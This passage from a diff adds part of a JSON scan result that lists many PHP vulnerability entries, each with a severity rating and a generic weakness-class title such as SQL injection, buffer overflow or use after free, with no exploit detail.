"Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Cryptographic Issues Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Cryptographic Issues Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Use of Externally-Controlled Format String Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Use of Externally-Controlled Format String Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Low", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Low", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Cryptographic Issues Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Cryptographic Issues Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Control of Generation of Code ('Code Injection') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP DEPRECATED: Code Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Data Processing Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Data Processing Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Data Processing Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Cryptographic Issues Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Cryptographic Issues Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Low", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Low", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Low", + "Title": "PHP Improper Link Resolution Before File Access ('Link Following') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Control of Generation of Code ('Code Injection') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Access Control Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Missing Release of Resource after Effective Lifetime Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Uncontrolled Resource Consumption Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Low", + "Title": "PHP Improper Link Resolution Before File Access ('Link Following') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Resource Management Errors Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Incorrect Conversion between Numeric Types Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Loop with Unreachable Exit Condition ('Infinite Loop') Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Uncontrolled Resource Consumption Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Deserialization of Untrusted Data Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Write Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Check for Unusual or Exceptional Conditions Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Permissions, Privileges, and Access Controls Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Control of Generation of Code ('Code Injection') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Write Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Deserialization of Untrusted Data Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Allocation of Resources Without Limits or Throttling Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Double Free Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Write Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP Exposure of Sensitive Information to an Unauthorized Actor Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Deserialization of Untrusted Data Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Write Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Medium", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Out-of-bounds Read Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Server-Side Request Forgery (SSRF) Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP NULL Pointer Dereference Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Integer Overflow or Wraparound Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Use After Free Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Insufficient Information Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Access Control Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Improper Input Validation Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Numeric Errors Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Improper Restriction of Operations within the Bounds of a Memory Buffer Vulnerability" + }, + { + "Severity": "High", + "Title": "PHP Other Vulnerability" + }, + { + "Severity": "Critical", + "Title": "PHP Numeric Errors Vulnerability" + } + ], + "LastSeenDate": 